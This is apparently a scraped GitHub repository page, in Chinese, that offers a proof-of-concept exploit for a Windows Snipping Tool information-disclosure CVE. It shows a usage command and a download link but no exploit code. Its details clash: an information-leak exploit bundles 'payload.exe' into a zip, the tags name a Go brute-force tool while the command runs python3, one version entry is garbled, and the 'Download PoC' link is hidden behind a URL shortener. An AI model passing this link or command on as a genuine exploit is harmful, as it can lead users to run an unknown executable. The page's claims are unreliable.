jenniferreire26/CVE-2026-33829

GitHub: jenniferreire26/CVE-2026-33829

针对 Windows 截图工具信息泄露漏洞(CVE-2026-33829)的 PoC 利用代码,支持通过命令行对目标系统发起验证性攻击。

Stars: 0 | Forks: 0

# CVE-2026-33829 - 安全漏洞 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重程度:** 中 - **CVSS:** 4.3 - **影响:** 机密性 - **发布日期:** 2026-04-14 ## 技术概述 Windows 截图工具中存在将敏感信息泄露给未经授权者的漏洞,允许未经授权的攻击者通过网络进行欺骗。 ## 受影响版本 **Microsoft Windows 10 1607:** - 10.0.14393.9060 之前 **Microsoft Windows 10 1809:** - 10.0.17763.8644 之前 **Microsoft Windows 10 21H2:** - 10.0.19044.7184 之前 **Microsoft Windows 10 22H2:** - 10.0.19045.7184 之前 **Microsoft Windows 11 23H2:** - 10.0.22631.6936 之前 **Microsoft Windows 11 24H2:** - 10.0.26100.8246 之前 **Microsoft Windows 11 25H2:** - 10.0.26200.8246 之前 **Microsoft Windows 11 26H1:** - 10.0.28000.1836 之前 **Microsoft Windows Server 2012:** - - - r2 **Microsoft Windows Server 2016:** - 10.0.14393.9060 之前 **Microsoft Windows Server 2019:** - 10.0.17763.8644 之前 **Microsoft Windows Server 2022:** - 10.0.20348.5020 之前 **Microsoft Windows Server 2022 23H2:** - 10.0.25398.2274 之前 **Microsoft Windows Server 2025:** - 10.0.26100.32690 之前 ## 参考 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33829 ## 利用 [下载 PoC](https://tinyurl.com/25psuyn3)
标签:Go语言工具, PoC, 威胁模拟, 安全漏洞, 文档结构分析, 暴力破解, 逆向工具